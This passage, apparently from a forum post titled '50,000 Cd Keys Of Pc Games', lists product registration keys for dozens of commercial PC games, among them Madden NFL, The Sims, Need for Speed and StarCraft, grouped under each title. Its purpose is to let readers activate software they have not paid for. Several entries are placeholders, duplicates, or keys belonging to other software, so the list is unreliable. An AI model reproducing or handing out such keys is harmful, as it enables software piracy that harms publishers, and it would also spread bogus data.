Rising[/b]\r\n[b]----------------[/b]\r\n[b]T2G2-MLET-XDZP-N462-HVTY[/b]\r\n[b]TWDD-M96W-HGUK-3EUM-9PVP[/b]\r\n[b]TTX3-PDZ3-EBNT-MLV4-M7L8[/b]\r\n[b]BD4U-4J7E-GU9W-54EW-7FL9[/b]\r\n[b]B4US-MPH4-4MF2-8E6G-GHQV[/b]\r\n\r\n[b]Joint Operations: Escalation[/b]\r\n[b]----------------[/b]\r\n[b]UT6B-VHA3-CWG6-SQAQ-YTNQ[/b]\r\n[b]U8RK-L58Q-5KT5-2JZZ-3RLD[/b]\r\n[b]UJC9-9S7A-4AAG-S368-4RLD[/b]\r\n[b]UFRL-PKPR-DKZ7-EUKD-4RLD[/b]\r\n[b]CLNZ-JRPZ-7MB2-SXR9-ERLD[/b]\r\n\r\n[b]Kuma War: The War on Terror[/b]\r\n[b]----------------[/b]\r\n[b]KUMA-A1A1-RDB8-QT7N[/b]\r\n[b]KUMA-A1A1-SYC5-FPSS[/b]\r\n[b]KUMA-A1A1-QHVF-Z2BE[/b]\r\n[b]KUMA-A1A1-3BWU-9TPK[/b]\r\n[b]KUMA-A1A1-VP97-74MG[/b]\r\n\r\n[b]LFP Manager 2003[/b]\r\n[b]----------------[/b]\r\n[b]7328-2480257-0244355-5107[/b]\r\n[b]7482-1812758-3422583-3701[/b]\r\n[b]7905-6392110-3161013-6330[/b]\r\n[b]3454-4263670-1186145-9527[/b]\r\n[b]0097-2243568-0597047-5217[/b]\r\n\r\n[b]LFP Manager 2004[/b]\r\n[b]----------------[/b]\r\n[b]AH88-W6PR-GPSV-FZU6-7U3B[/b]\r\n[b]EB8Y-444N-LW3M-Y9ZL-TJLB[/b]\r\n[b]3YZZ-9KQR-EPEZ-5DFD-MAL9[/b]\r\n[b]WGC4-2WG9-N2ME-RSTS-BTK3[/b]\r\n[b]SSUL-6UFH-PSEB-RNYG-9NNE[/b]\r\n\r\n[b]LFP Manager 2005[/b]\r\n[b]----------------[/b]\r\n[b]CLJ2-65FT-BQYE-M4Q8-26KL[/b]\r\n[b]AQK3-3PCF-BCWQ-MB2T-784Z[/b]\r\n[b]93AA-TA8B-PRGZ-6ZU7-26G6[/b]\r\n[b]PZ5D-ACN6-K394-7VA5-RZGX[/b]\r\n[b]AFX7-YPLS-5N8H-D8RP-VXAZ[/b]\r\n\r\n[b]LNF Manager 2002[/b]\r\n[b]----------------[/b]\r\n[b]8177-4697410-7880055-5922[/b]\r\n[b]1226-2217367-1677912-2907[/b]\r\n[b]4433-0243807-1153203-0630[/b]\r\n[b]9023-5088341-8439224-3278[/b]\r\n[b]4252-5541128-1310507-1121[/b]\r\n\r\n[b]Madden NFL 2002[/b]\r\n[b]----------------[/b]\r\n[b]4388-4795175-8346580-6915[/b]\r\n[b]7842-9734988-8129955-2948[/b]\r\n[b]1599-3986956-1129944-5344[/b]\r\n[b]5061-4242349-9616848-7641[/b]\r\n[b]3674-0074010-6203959-8425[/b]\r\n\r\n[b]Madden NFL 2003[/b]\r\n[b]----------------[/b]\r\n[b]SGAQ-AL6E-B4UY-YB8S[/b]\r\n[b]BPRK-PZHF-THEF-J8WX[/b]\r\n[b]4AN6-FQZG-L2RY-L2QR[/b]\r\n[b]LEX4-WZJ2-NY2A-UAF8[/b]\r\n[b]QS42-5HYC-E95L-FBZ9[/b]\r\n\r\n[b]Madden NFL 2004[/b]\r\n[b]----------------[/b]\r\n[b]PUY8-DB6R-JN4P-HSJK-W594[/b]\r\n[b]DVL4-3KLA-AQFJ-V2NZ-SJE3[/b]\r\n[b]SH9H-XVYJ-UFND-5E9G-89P6[/b]\r\n[b]PDHZ-TNFP-WVGL-QUN5-L64V[/b]\r\n[b]ZJMD-K4A5-KUY9-2XUP-2RTM[/b]\r\n\r\n[b]Madden NFL 2005[/b]\r\n[b]----------------[/b]\r\n[b]4LLL-XJ4H-PQV2-82AB-BF8Z[/b]\r\n[b]MRKK-A5HD-8GWR-Q4PL-EYUT[/b]\r\n[b]P6VV-BGDQ-UASC-8YPB-PHMV[/b]\r\n[b]UP44-FXDM-TUBS-Y7WJ-T3P7[/b]\r\n[b]ZRE6-4G64-C63W-GBUH-CR35[/b]\r\n\r\n[b]Matrix: Online[/b]\r\n[b]----------------[/b]\r\n[b]1552-5638-1558-1337-N008[/b]\r\n\r\n\r\n[b]Hint:If you need a key and think that this list is too long and find it difficult to search..[/b]\r\n\r\n[b]Hit CRTL+F and type in the name of the Game,you\'ll be there[/b]\r\n\r\n\r\n\r\n\r\n[b]50,000 Cd Keys Of Pc Games[/b]\r\n[b][/b][/b]\r\n\r\n[b]Medal of Honor: Allied Assault[/b]\r\n[b]----------------[/b]\r\n[b]6637-0880151-9362063-6529[/b]\r\n[b]1031-5864656-7758949-7569[/b]\r\n[b]6376-9736948-9267793-2214[/b]\r\n[b]0536-0826759-9189244-5770[/b]\r\n[b]6942-3862662-1619177-7525[/b]\r\n\r\n[b]Medal of Honor: Spearhead[/b]\r\n[b]----------------[/b]\r\n[b]3426-7701639-7250778-4418[/b]\r\n[b]7894-0307736-4309059-4706[/b]\r\n[b]5637-6168520-8827988-2546[/b]\r\n[b]7930-5111169-1502526-4140[/b]\r\n[b]8322-6613419-9951137-2000[/b]\r\n\r\n[b]Medal of Honor: Breakthrough[/b]\r\n[b]----------------[/b]\r\n[b]KE2S-CX95-EMXH-QQTX-RX4N[/b]\r\n[b]2BBT-LVTJ-S324-HC3S-PE4U[/b]\r\n[b]4UQY-UC2U-FVFP-VTYU-JTBE[/b]\r\n[b]3LP7-ZL59-ENHM-PYCU-AULJ[/b]\r\n[b]76ZR-4ATE-6TYQ-KWPD-F9RL[/b]\r\n\r\n[b]Medal of Honor: Pacific Assault[/b]\r\n[b]----------------[/b]\r\n[b]XXHR-729P-Y8LP-59JC-BRQJ[/b]\r\n[b]J2HH-PNUD-CXFK-MSWM-RWEM[/b]\r\n[b]BUW6-8FLA-8L8G-WZZM-FJ64[/b]\r\n[b]DBSJ-AEN4-UMQL-V4V5-WK72[/b]\r\n[b]SNLU-BAMU-LP3L-KSFE-JRLD[/b]\r\n\r\n[b]MVP Baseball 2003[/b]\r\n[b]----------------[/b]\r\n[b]PH4N-BTHK-GVRC-D5T5[/b]\r\n[b]HZ8U-L2C3-AWU2-2Y4L[/b]\r\n[b]R39T-5LC7-XJRF-RF37[/b]\r\n[b]D9PP-EN4V-NCT8-2W34[/b]\r\n[b]2BVH-BEY8-8C6N-YHC2[/b]\r\n\r\n[b]MVP Baseball 2004[/b]\r\n[b]----------------[/b]\r\n[b]BM2S-5J8R-5YP9-XZMT-LZHU[/b]\r\n[b]TC9R-G4JF-ZHS4-K7ER-B3QS[/b]\r\n[b]RHH9-V4RD-QGJT-L34U-37B7[/b]\r\n[b]GP99-T9WU-TTMA-JYQK-MGX2[/b]\r\n[b]Z5H9-Y5S3-F7PA-KB69-DVES[/b]\r\n\r\n[b]NASCAR Thunder 2003[/b]\r\n[b]----------------[/b]\r\n[b]HWAW-BV8D-WYBA-V8D6[/b]\r\n[b]ZFAP-Y3JF-9TSD-H43M[/b]\r\n[b]YHKZ-BZJN-JLV8-2HV3[/b]\r\n[b]NW9E-V9H7-7EQD-3CMG[/b]\r\n[b]J34K-Y3BF-TS9E-QBBL[/b]\r\n\r\n[b]NASCAR Thunder 2004[/b]\r\n[b]----------------[/b]\r\n[b]B555-L2LP-NBZG-TTQF-ST7L[/b]\r\n[b]U4WN-Q7ZV-NM6S-DN77-JNRF[/b]\r\n[b]XJZR-KR3L-QFSP-56AJ-3R2Z[/b]\r\n[b]BR8Y-CRR7-KJD5-7DYQ-9NXR[/b]\r\n[b]QK88-A8B2-P5M7-AM7G-8SRM[/b]\r\n\r\n[b]NBA Live 2001[/b]\r\n[b]----------------[/b]\r\n[b]0011-8452748-8024535-5394[/b]\r\n[b]6068-4424851-7616042-3649[/b]\r\n[b]8644-4406490-5087796-6029[/b]\r\n[b]6576-6946899-5075485-0232[/b]\r\n[b]3045-2927629-1069868-2592[/b]\r\n\r\n[b]NBA Live 2003[/b]\r\n[b]----------------[/b]\r\n[b]EVXM-E7YN-XLQF-L36C[/b]\r\n[b]RTMR-4CCL-J5PB-2YX6[/b]\r\n[b]SF69-RKN7-LXNS-3X72[/b]\r\n[b]YHH3-6544-T632-KF8C[/b]\r\n[b]5CH5-JZXR-YRL2-9EZW[/b]\r\n\r\n[b]NBA Live 2004[/b]\r\n[b]----------------[/b]\r\n[b]MVNE-PPV4-EHNA-WTFD-LC9K[/b]\r\n[b]3DGQ-2DUC-YSFK-KC36-P9JD[/b]\r\n[b]5P8Y-Z8J2-XAYC-CFZ9-72WF[/b]\r\n[b]YHA2-9VEB-K9AC-D22F-HVKJ[/b]\r\n[b]YHE6-BVBK-QNVE-RU45-3N9V[/b]\r\n\r\n[b]NBA Live 2005[/b]\r\n[b]----------------[/b]\r\n[b]AYJ2-JCQD-W875-3CV7-4GQ7[/b]\r\n[b]J7BB-LRTP-GJUV-Q99D-3B85[/b]\r\n[b]X3D5-55JU-7B77-SW4Y-FC5U[/b]\r\n[b]3RFF-5ZSJ-5ZYT-LNDX-PNP8[/b]\r\n[b]8ZBB-TSZE-Q249-N9EV-8EM6[/b]\r\n\r\n[b]Need for Speed 3: Hot Pursuit[/b]\r\n[b]----------------[/b]\r\n[b]8249-7EE3-84EW-TXGT[/b]\r\n\r\n[b]Need For Speed 5: Porsche Unleased[/b]\r\n[b]----------------[/b]\r\n[b]14077-BUSY-CODA-CALF-BIFF[/b]\r\n[b]14077 BUSY DUNK BEAN FROG[/b]\r\n[b]14077-BUSY-HEED-GONE-FALL[/b]\r\n[b]14077-TOYS-PORK-SHOP-TEST[/b]\r\n[b]14077-TOIL-RULE-FIRE-TEND[/b]\r\n\r\n[b]Need for Speed 6: Hot Pursuit 2[/b]\r\n[b]----------------[/b]\r\n[b]2C7L-HZKL-3VNA-JJZF[/b]\r\n[b]8249-7EE3-84EW-TXGT[/b]\r\n[b]9YGT-BX7S-S6GS-PBNQ[/b]\r\n[b]XTJY-7PS2-CAJ2-A7EX[/b]\r\n[b]WUQ3-4ALW-BM23-DU6B[/b]\r\n\r\n[b]Need for Speed: Underground[/b]\r\n[b]----------------[/b]\r\n[b]F6LL-LZPR-5PUD-R9WL-VJKZ[/b]\r\n[b]NX7F-NB87-NG5F-U2WS-7HNF[/b]\r\n[b]NM8G-HDRK-S72T-EYL4-WXUR[/b]\r\n[b]PD7P-MW9T-UTDU-BDFS-L6YL[/b]\r\n[b]H9CC-23EM-2L3K-LC98-5DEV[/b]\r\n\r\n[b]Need for Speed: Underground 2[/b]\r\n[b]----------------[/b]\r\n[b]NSE6-R8BA-G8QG-L5VU-L2A9[/b]\r\n[b]S8NN-99CK-KUL3-L38W-VEYB[/b]\r\n[b]KXZ9-R2L4-K4S9-CQDM-K9A9[/b]\r\n[b]KY7X-8LLB-3H8F-N4KG-D8JH[/b]\r\n[b]ZY5V-X9EE-J4EL-AMC5-RLD0[/b]\r\n\r\n[b]Neverwinter Nights[/b]\r\n[b]----------------[/b]\r\n[b]QFETM-MPU3X-DN6FF-MHFDA-YWARA-4HMPE-RDJTG[/b]\r\n[b]UYLVL-UDRG9-U73FN-L7Y4J-YPFLT-PNPP4-VHCTL[/b]\r\n[b]QXHRE-LYWHW-MYRJD-7W9YJ-NPT9W-LMTWF-9ERAE[/b]\r\n\r\n[b]Neverwinter Nights: Shadows of Undrentide[/b]\r\n[b]----------------[/b]\r\n[b]4YU9C-DUTT9-JFH3C-766UM-QF6N3-DHATY-3VMQM[/b]\r\n[b]RX4KP-Y6P9Q-6H6PL-GRCK7-FFP7G-PJ64E-DA9J6[/b]\r\n[b]FAQC4-X9K4G-EVDUX-HAGAL-QNP4X-34CNX-ECADC[/b]\r\n[b]9XEWK-AGG9L-TYF7M-693RY-HU3EQ-HDUD3-GR3JV[/b]\r\n[b]J7NPQ-FAECQ-J7WTM-GRRGW-EUQVG-QCEY3-P4YAE[/b]\r\n\r\n[b]NHL 2002[/b]\r\n[b]----------------[/b]\r\n[b]5889-4495387-1059328-2260[/b]\r\n[b]3842-7577253-5843711-4677[/b]\r\n[b]1699-8072617-0717944-1453[/b]\r\n[b]9502-8526562-9903425-7554[/b]\r\n[b]7116-0792531-1951672-8869[/b]\r\n\r\n[b]NHL 2003[/b]\r\n[b]----------------[/b]\r\n[b]EWSE-7JU8-NA6Q-W4VP[/b]\r\n[b]BMQW-BQ4K-YVCW-QH58[/b]\r\n[b]977A-8A2D-7SH8-VY2B[/b]\r\n[b]WAAH-RTTQ-NBJW-4TAE[/b]\r\n[b]2874-BCNZ-RREY-9HU3[/b]\r\n\r\n[b]NHL 2004[/b]\r\n[b]----------------[/b]\r\n[b]6TGG-H3PB-Q7U4-H3KD-JM42[/b]\r\n[b]KP5V-2TDD-DNC9-JY2U-XHQW[/b]\r\n[b]AMAJ-VZUH-LG2A-NFMF-FNQW[/b]\r\n[b]PANE-VUTQ-KM3A-8E4E-XBUN[/b]\r\n[b]N5VM-FS2Z-5P39-8BR3-NQDJ[/b]\r\n\r\n[b]NHL 2005[/b]\r\n[b]----------------[/b]\r\n[b]8MH9-7X8P-KW3Q-SZUS-YXSH[/b]\r\n[b]3PWN-XMNM-M35A-QC2V-5LWB[/b]\r\n[b]PFU4-9AEW-8BTN-WPAT-UBQN[/b]\r\n[b]QZEN-XFFS-XZS4-9LCY-UB6C[/b]\r\n[b]4JHR-N3FY-4M6K-RWVE-2S2B[/b]\r\n\r\n[b]No One Lives Forever 2[/b]\r\n[b]----------------[/b]\r\n[b]GUZ7-PYW8-FUR6-DEG3-9399[/b]\r\n[b]FYJ9-FEF8-PEZ4-LUN2-6472[/b]\r\n[b]RYX8-MEF3-LEW2-ZEP2-7834[/b]\r\n[b]TYX9-WYG4-LUD8-MED2-6573[/b]\r\n[b]GEG8-XUX6-MUT7-PYP6-2647[/b]\r\n\r\n[b]Nox[/b]\r\n[b]----------------[/b]\r\n[b]017896-376549-071924-5507[/b]\r\n[b]017934-718048-114782-5775[/b]\r\n[b]017988-148677-811020-0366[/b]\r\n[b]017989-190334-175336-2528[/b]\r\n[b]018242-676109-162214-8592[/b]\r\n\r\n[b]Operation Flashpoint: Resitance[/b]\r\n[b]----------------[/b]\r\n[b]KMV6-47KHD-031KX-N9EGY-EMFLG[/b]\r\n[b]DZF5-J3KC6-BA3X6-1HCTR-PDK27[/b]\r\n[b]C6GB-C35F1-3HDKC-WW5J3-2Y0VZ[/b]\r\n[b]5P66-4TZX9-3W7G1-91WRW-6Y30X[/b]\r\n[b]FSHG-W7L80-1Y2R9-HKRKZ-89XSV[/b]\r\n\r\n[b]Painkiller[/b]\r\n[b]----------------[/b]\r\n[b]3C37-E09F-8221-E4A6[/b]\r\n[b]8E96-E185-B765-583E[/b]\r\n[b]3DF2-AA3B-1E76-4F20[/b]\r\n[b]2013-38E6-4AE5-0A74[/b]\r\n[b]2CF0-E330-6D62-8791[/b]\r\n\r\n[b]Pearl Harbor Zero Hour[/b]\r\n[b]----------------[/b]\r\n[b]13FAA171-5FBC-4462-8AC2-2658727CE698[/b]\r\n\r\n[b]Project IGI-2[/b]\r\n[b]----------------[/b]\r\n[b]031F-F8D0-6536-B510[/b]\r\n\r\n[b]Project IGI-2: Covert Strike[/b]\r\n[b]----------------[/b]\r\n[b]70F4-AFA3-5374-3342[/b]\r\n[b]27A2-B504-9E22-C6AE[/b]\r\n[b]2325-7E35-0D25-1BE5[/b]\r\n[b]6C74-1833-AB64-CE02[/b]\r\n[b]FF72-9E82-C1F2-E5FC[/b]\r\n\r\n[b]Quake 3: Arena[/b]\r\n[b]----------------[/b]\r\n[b]7D3A-3GAB-3ADH-AA72-D7[/b]\r\n[b]GD2D-2CDG-L7DD-DGLL-2F[/b]\r\n[b]77LC-A33B-37L2-JGAC-E3[/b]\r\n[b]LBJ7-GBJ2-2AJG-3DDL-1F[/b]\r\n[b]HJA7-CBL2-HG7C-GAHD-2A[/b]\r\n\r\n[b]Return to Castle Wolfeinstein[/b]\r\n[b]----------------[/b]\r\n[b]CCWD-HCJG-SPAH-PCLJ-7E[/b]\r\n[b]CJLH-ACAC-CDPT-DDCS-25[/b]\r\n[b]CLAL-A7WJ-DTSJ-WARP-88[/b]\r\n[b]GWSG-ADCD-ALGH-LTLW-1F[/b]\r\n[b]SJDG-DCRG-GTPA-JHDC-2B[/b]\r\n\r\n[b]Rise of Nations[/b]\r\n[b]----------------[/b]\r\n[b]FCKGW-RHQO2-YXRKT-BTG6W-2BYQ8[/b]\r\n[b]RXVC3-B3347-DVG9X-FTFQF-9M7XT[/b]\r\n[b]RD4D4-B94XK-QVWFP-K9PJD-GVRV3[/b]\r\n[b]G4V6Q-VGHQR-DX2YB-XHCM3-YTF66[/b]\r\n[b]TYH8K-K648T-G9PRG-6RQB2-B3T3G[/b]\r\n\r\n[b]Rise of Nations: Thrones & Patriots[/b]\r\n[b]----------------[/b]\r\n[b]WW69F-K7BXC-P37BF-8VQ48-HY3FB[/b]\r\n[b]JGCYQ-9B747-4VQH4-G6BCU-YUIJU[/b]\r\n\r\n[b]Roller Coaster Tycoon 3[/b]\r\n[b]----------------[/b]\r\n[b]Q497-WQF8-KSNZ-AEA2-BUFM-9PRM[/b]\r\n[b]RLD6-6AHJ-AMVV-YTEF-CTAD-ZQQV[/b]\r\n[b]XA3D-FWP8-ULLK-S7J2-ETWN-45UL[/b]\r\n[b]RLDN-Y6SQ-G5ES-HWR7-CR4B-M8AC[/b]\r\n[b]RLDU-M24D-83CX-C8LZ-WDHS-ETND[/b]\r\n\r\n[b]Hint:If you need a key and think that this list is too long and find it difficult to search..[/b]\r\n[b]Hit CRTL+F and type in the name of the Game,you\'ll be there[/b]\r\n\r\n\r\n[b]50,000 Cd Keys Of Pc Games[/b]\r\n[b][/b][/b]\r\n\r\n[b]Rugby 2004[/b]\r\n[b]----------------[/b]\r\n[b]PXMM-YCAW-TGKZ-4F75-HL6V[/b]\r\n[b]P74L-JWA3-THBH-JVRE-VF5Z[/b]\r\n[b]PWK3-GDA4-TXCB-VB8P-KCQB[/b]\r\n[b]PD5V-Z5AW-TRXK-7U2H-DQHR[/b]\r\n[b]PU2S-DTA3-TLMH-47CP-5PQH[/b]\r\n\r\n[b]Savage: The Battle For Newerth[/b]\r\n[b]----------------[/b]\r\n[b]LB42-Z05V-VK9S-I7BM-58S5[/b]\r\n[b]UBS4-Y39C-B2D7-8SAF-H7C9[/b]\r\n\r\n[b]Shogun Total War[/b]\r\n[b]----------------[/b]\r\n[b]5996-3135972-7020316-2750[/b]\r\n[b]3494-3117019-4062694-5812[/b]\r\n[b]1097-1957141-7721126-2658[/b]\r\n\r\n[b]1453-9644381-3845463-4257[/b]\r\n[b]5675-3034428-9824789-3164[/b]\r\n\r\n[b]Shogun Total War: Mongol Invasion[/b]\r\n[b]----------------[/b]\r\n[b]2354-3824952-7553989-1873[/b]\r\n[b]1969-7725965-7171103-8026[/b]\r\n[b]3778-4915860-9836057-0320[/b]\r\n[b]0398-3307104-2497608-7156[/b]\r\n[b]1675-9487775-0776511-1211[/b]\r\n\r\n[b]Shogun Total War: Warlord Edition[/b]\r\n[b]----------------[/b]\r\n[b]5496-5739988-7541134-2314[/b]\r\n[b]8591-7585011-3889523-3172[/b]\r\n[b]9428-3704395-2811213-1516[/b]\r\n[b]2540-1104716-3008863-5304[/b]\r\n[b]5767-5317389-3681312-3446[/b]\r\n\r\n\r\n[b]Soldier of Fortune II: Double Helix[/b]\r\n[b]----------------[/b]\r\n[b]R4RM-8EWW-R77T-7W3M-AF[/b]\r\n[b]PFTE-H87X-E7F8-HWRF-FE[/b]\r\n[b]RFXT-4W88-3EKH-4FHW-5F[/b]\r\n[b]73J7-TRRK-JHHE-TXHE-45[/b]\r\n[b]4REM-E3EH-HXR3-X83T-62[/b]\r\n\r\n[b]Soldiers: Heroes of World War II[/b]\r\n[b]----------------[/b]\r\n[b]CBXP3Y-KY7JDK-RXW8TA-QA8UVU[/b]\r\n[b]JA8KAN-DL2CJZ-B5CHUN-5E75YS[/b]\r\n[b]PU5CGY-2VFKAC-N9Z85Z-3CYURQ[/b]\r\n\r\n[b]Soldner[/b]\r\n[b]----------------[/b]\r\n[b]DTTAS-TBERF-DRUCR-WEWR7[/b]\r\n[b]2S8SS-T5XPP-DB878-YRT4H[/b]\r\n[b]5BRD3-SESFW-8UR4T-2D2D7[/b]\r\n[b]WY35A-B96F5-ZWRH7-RWWH7[/b]\r\n[b]DSPSU-C2DRC-5BUA2-2HJEH[/b]\r\n\r\n[b]StarCraft[/b]\r\n[b]----------------[/b]\r\n[b]3627-12063-8616[/b]\r\n[b]1234-56789-1234[/b]\r\n[b]1998-00000-1997[/b]\r\n[b]1234-56789-0002[/b]\r\n[b]3535-87030-0179[/b]\r\n\r\n[b]StarCraft: Brood War[/b]\r\n[b]----------------[/b]\r\n[b]8617-78196-1896[/b]\r\n[b]2061-20299-0639[/b]\r\n[b]2859-65262-1030[/b]\r\n\r\n[b]Star Wars: Battlefront[/b]\r\n[b]----------------[/b]\r\n[b]BF0C-A77C-7457-8A98-SA40[/b]\r\n[b]6A50-15B8-DA9f-979C-NA40[/b]\r\n[b]44E5-2EEb-410A-1F78-JA40[/b]\r\n[b]f97C-1A37-0A7E-2AD7-SA40[/b]\r\n[b]D8A4-5978-459B-D24f-SA40[/b]\r\n\r\n[b]Star Wars: Republic Commando[/b]\r\n[b]----------------[/b]\r\n[b]8C55-9AA0-B502-7286-EU20[/b]\r\n[b]20CB-230B-2BB0-73C1-EU20[/b]\r\n[b]A9DB-3022-05A2-C4C0-EU20[/b]\r\n[b]065F-7430-FA28-1072-EU20[/b]\r\n[b]7A86-5288-B403-E629-EU20[/b]\r\n\r\n[b]Superbike 2001[/b]\r\n[b]----------------[/b]\r\n[b]6599-6744048-3296610-1069[/b]\r\n[b]9811-4399471-0608662-4430[/b]\r\n[b]5914-0190952-5297080-4361[/b]\r\n[b]1560-5964393-0191638-2829[/b]\r\n[b]6897-4942550-7701245-3809 [/b][/b]\r\n\r\n\r\n[b]Swat 3[/b]\r\n[b]----------------[/b]\r\n[b]LOS4-GAB8-ZEG8-XAN3-7325[/b]\r\n[b]XEP6-LAB2-NUP9-WAC2-5927[/b]\r\n[b]BAC2-BAB2-BAB2-BAB2-2352[/b]\r\n[b]LUS7-JAB4-TUG8-WEF6-4883[/b]\r\n\r\n[b]Swat 3: Close Quarters Battle[/b]\r\n[b]----------------[/b]\r\n[b]TER2-NAB8-PAB9-SEM7-5658[/b]\r\n[b]XEP7-CAB6-GEP3-DEM2-3757[/b]\r\n\r\n[b]Swat 3: Elite Edition[/b]\r\n[b]----------------[/b]\r\n[b]LYS4-MAB4-TYM7-REC3-3323[/b]\r\n[b]LYF7-FUB6-JEM5-NUD6-5854[/b]\r\n[b]LYF9-JUB4-BUM3-ZED7-9774[/b]\r\n[b]TED4-SAB4-DUB7-CYJ2-8652[/b]\r\n[b]DUB4-ZUC4-WEB3-LEC2-9947[/b]\r\n\r\n[b]Swat 4[/b]\r\n[b]----------------[/b]\r\n[b]LEB6-BAF6-DEG7-TEZ6-5344[/b]\r\n[b]DUT7-MEB5-FUB3-FUC6-3949[/b]\r\n[b]MYX9-PUW6-LUL4-BUG2-2683[/b]\r\n[b]TYC4-XUB6-ZYG2-LYR4-8698[/b]\r\n[b]GEC9-BEG5-MUX8-BEP8-5869[/b]\r\n\r\n[b]Terminator 3: War of the Machines[/b]\r\n[b]----------------[/b]\r\n[b]KGXP-C4SE-2M43-9XDK-FDEV[/b]\r\n[b]2LUC-S8NF-LWK3-E24S-2DEV[/b]\r\n[b]A8VM-9VQP-EQSE-NEY4-2DEV[/b]\r\n[b]Y6GQ-Q4AL-EJ4Y-3S6Y-GDEV[/b]\r\n[b]HETT-Y3ZL-9S4Z-J8JJ-ADEV[/b]\r\n\r\n[b]The Sims[/b]\r\n[b]----------------[/b]\r\n[b]100486-585530-905808-0928[/b]\r\n[b]105497-859214-224982-2841[/b]\r\n[b]100380-894345-537976-4619[/b]\r\n[b]100486-585530-905808-0928[/b]\r\n[b]150713-658127-750533-3021[/b]\r\n\r\n[b]The Sims: Deluxe Edition[/b]\r\n[b]----------------[/b]\r\n[b]5324-5883189-3168519-2745[/b]\r\n[b]5809-1600568-4466852-0132[/b]\r\n[b]2890-0494125-5982016-0417[/b]\r\n[b]9823-5334180-4607211-2204[/b]\r\n[b]3352-7191013-4602770-0912[/b]\r\n\r\n[b]The Sims: Living Large[/b]\r\n[b]----------------[/b]\r\n[b]1501-7545717-1091441-0391[/b]\r\n[b]1501-6866508-5905706-5454[/b]\r\n[b]5501-9036313-0444881-7172[/b]\r\n[b]8663-4966712-3945768-1934[/b]\r\n[b]4532-3121193-5104301-4938[/b]\r\n\r\n[b]The Sims: House Party[/b]\r\n[b]----------------[/b]\r\n[b]1500-5354306-2603693-5606[/b]\r\n[b]1502-2111302-2656399-1470[/b]\r\n[b]1505-7507332-5400384-5830[/b]\r\n[b]0901-4177371-2064872-3510[/b]\r\n[b]2500-1197387-6990762-4234[/b]\r\n\r\n[b]The Sims: Hot Date[/b]\r\n[b]----------------[/b]\r\n[b]4509-7813373-8688627-1670[/b]\r\n[b]4520-8696193-6180404-3409[/b]\r\n[b]7716-6059818-1424286-6030[/b]\r\n[b]2500-1758340-2632686-4208[/b]\r\n[b]1501-7709210-3634998-1949[/b]\r\n\r\n[b]The Sims: Vacation[/b]\r\n[b]----------------[/b]\r\n[b]1500-9874009-0973804-6601[/b]\r\n[b]1500-6766850-1565793-1840[/b]\r\n[b]4502-3691635-4925564-5919[/b]\r\n[b]4502-7138965-9125175-2412[/b]\r\n[b]5414-3558414-5169504-3313[/b]\r\n\r\n[b]The Sims: Unleashed[/b]\r\n[b]----------------[/b]\r\n[b]2500-0540593-1364233-0105[/b]\r\n[b]9932-1129289-4998838-6403[/b]\r\n[b]4500-4340504-5039624-5108[/b]\r\n[b]1500-3896457-1586058-7708[/b]\r\n[b]1501-6672127-6874113-7011[/b]\r\n\r\n[b]The Sims: Making Magic[/b]\r\n[b]----------------[/b]\r\n[b]BESA-WVUM-5C95-JNXY-VDEV[/b]\r\n[b]QAPX-CH4R-NYQS-YS4Y-UDEV[/b]\r\n[b]CQPX-X9EZ-SWNC-7GLN-CDEV[/b]\r\n[b]HFPP-429U-7EAN-HJ3G-RTWS[/b]\r\n[b]VSHR-ZLGZ-HXWP-EBVZ-KDEV[/b]\r\n\r\n[b]The Sims: Superstar[/b]\r\n[b]----------------[/b]\r\n[b]8640-6354650-5360929-5431[/b]\r\n[b]4662-8764186-9129013-5400[/b]\r\n[b]8159-9741155-6600844-1305[/b]\r\n[b]3816-8723326-4556354-1212[/b]\r\n[b]5813-4112330-4054715-6610[/b]\r\n\r\n[b]The Sims: Online[/b]\r\n[b]----------------[/b]\r\n[b]EKRR-B77T-2LHC-UVW8[/b]\r\n[b]9PZ5-9R4C-RUN6-3MQE[/b]\r\n[b]U53B-QNZU-3S2E-F6Y6[/b]\r\n[b]9A5E-2A68-EF2A-EXR5[/b]\r\n[b]8SJM-M87Q-FTLY-3TXN[/b]\r\n\r\n[b]The Sims 2[/b]\r\n[b]----------------[/b]\r\n[b]BKUL-CS68-J6AT-37Y7-KX4F[/b]\r\n[b]374U-U5GT-1RZ9-4PDG-T5QZ[/b]\r\n[b]DKSS-YCA2-ZO11-SSP7-3AFH[/b]\r\n[b]XUT3-6LHW-ZOR1-JH7N-VV7I[/b]\r\n[b]DWJ2-Q92Z-R1R1-5F6R-077P[/b]\r\n\r\n[b]The Sims 2: University[/b]\r\n[b]----------------[/b]\r\n[b]CFD5-H2VX-MVNG-PG81-N4D4[/b]\r\n[b]R44C-HRNL-VUCT-8WAZ-U1G9[/b]\r\n[b]6PFX-W8AH-MVNG-X90X-F4JH[/b]\r\n[b]SPQQ-KC0R-NVNG-ZB8D-K4A4[/b]\r\n[b]IENW-DVBZ-YVNG-RO3O-A4ET[/b]\r\n\r\n[b]The Lord of The Rings: The Battle For Middle-Earth[/b]\r\n[b]----------------[/b]\r\n[b]CTJ2-P7UQ-KCQY-FJDL-6BZ5[/b]\r\n[b]PWDM-7UN5-8K3G-YZLS-RSDX[/b]\r\n[b]SBYG-287U-NRBH-WWCL-HE8J[/b]\r\n[b]VUKT-G8J9-ZV2N-AX8K-EN8Z[/b]\r\n[b]RQRR-MSQQ-QC6A-9URN-L544[/b]\r\n\r\n[b]The Lord of The Rings: The Return of The King[/b]\r\n[b]----------------[/b]\r\n[b]FBG8-MMAS-457W-BP36-QWBN[/b]\r\n[b]FBXF-4W93-TG36-CV4M-XXUV[/b]\r\n[b]3ZNW-633G-TP9Q-NBVH-8QTE[/b]\r\n[b]KYE6-RUPA-W2VC-AF83-AXQL[/b]\r\n[b]TMX7-JZ3N-6V2Z-WC5X-B9TL[/b]\r\n\r\n[b]Hint:If you need a key and think that this list is too long and find it difficult to search..[/b]\r\n\r\n[b]Hit CRTL+F and type in the name of the Game,you\'ll be there[/b]\r\n\r\n\r\n\r\n\r\n\r\n[b]50,000 Cd Keys Of Pc Games[/b]\r\n\r\n\r\n[b]The Lord of The Rings: War of the Ring[/b]\r\n[b]----------------[/b]\r\n[b]BUT2-JET4-MED8-PUB7-3253[/b]\r\n[b]JAJ6-SUF9-XAM6-JUJ3-4884[/b]\r\n[b]JAF9-DAW7-SEG8-GUR4-9922[/b]\r\n[b]XEP8-JUM5-DYL7-ZYR2-6283[/b]\r\n[b]CYS7-DYW5-NEF5-CEX4-4325[/b]\r\n\r\n[b]Theme Park 